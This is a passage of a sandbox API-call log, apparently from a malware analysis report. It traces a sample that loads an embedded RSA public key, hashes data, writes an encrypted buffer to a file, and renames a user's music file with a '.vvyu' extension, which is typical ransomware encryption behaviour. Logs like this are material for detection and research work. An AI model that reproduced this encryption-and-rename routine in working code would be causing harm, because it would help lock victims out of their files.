KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.924] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0186.924] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0186.926] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0186.926] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0186.926] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0186.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0186.926] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0186.926] GetLastError () returned 0x0 [0186.926] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0186.926] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0186.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0186.927] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0186.927] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0186.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0186.927] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0186.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0186.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x175d0) returned 0x2d43778 [0186.928] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0186.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38958 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb28 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d389a0 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eb10 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6dc8f8 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0186.929] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3bb48 [0186.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0186.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0186.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0186.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0186.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0186.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eaf8 [0186.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0186.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x6dc8f8 [0186.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0186.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0186.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0186.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0186.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0186.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0186.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0186.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0186.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0186.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0186.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0186.932] GetCurrentThreadId () returned 0x264 [0186.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0186.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d376d8 [0186.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0186.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0186.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0186.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0186.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0186.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0186.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.933] GetCurrentThreadId () returned 0x264 [0186.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0186.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0186.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0186.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0186.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0186.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0186.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0186.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0186.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0186.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0186.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0186.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6dc8f8 [0186.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0186.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0186.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0186.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39688 [0186.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0186.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396a0 [0186.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0186.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0186.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396b8 [0186.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0186.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0186.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0186.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396e8 [0186.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0186.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396d0 [0186.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0186.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0186.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0186.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0186.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0186.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0186.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4eaf8 [0186.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0186.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0186.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eae0 | out: hHeap=0x6a0000) returned 1 [0186.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0186.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0186.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0186.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0186.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0186.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0186.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0186.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eaf8 | out: hHeap=0x6a0000) returned 1 [0186.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0186.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0186.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0186.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0186.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0186.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0186.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0186.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0186.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0186.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0186.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0186.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0186.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0186.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0186.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0186.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0186.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0186.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0186.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0186.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0186.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0186.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4eb10 | out: hHeap=0x6a0000) returned 1 [0186.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d389a0 | out: hHeap=0x6a0000) returned 1 [0186.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0186.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0186.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0186.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0186.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0186.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0186.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0186.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0186.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0186.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0186.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0186.944] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x175c9, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x175c9, lpOverlapped=0x0) returned 1 [0186.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0186.947] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x175ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.947] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0186.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0186.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0186.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0186.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0186.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0186.948] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0186.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0186.949] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0186.949] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0186.949] CloseHandle (hObject=0x584) returned 1 [0186.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0186.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0186.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0186.951] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\7pEW.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\7pew.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\7pEW.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\7pew.mp3.vvyu")) returned 1 [0186.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.953] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.955] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e80a6a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d389a0 [0186.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fdf8 [0186.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d389a0 | out: hHeap=0x6a0000) returned 1 [0186.956] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\desktop.ini") returned=".ini" [0186.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.956] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1abd4b0, ftCreationTime.dwHighDateTime=0x1d8a3eb, ftLastAccessTime.dwLowDateTime=0x6bfe5650, ftLastAccessTime.dwHighDateTime=0x1d8a457, ftLastWriteTime.dwLowDateTime=0x6bfe5650, 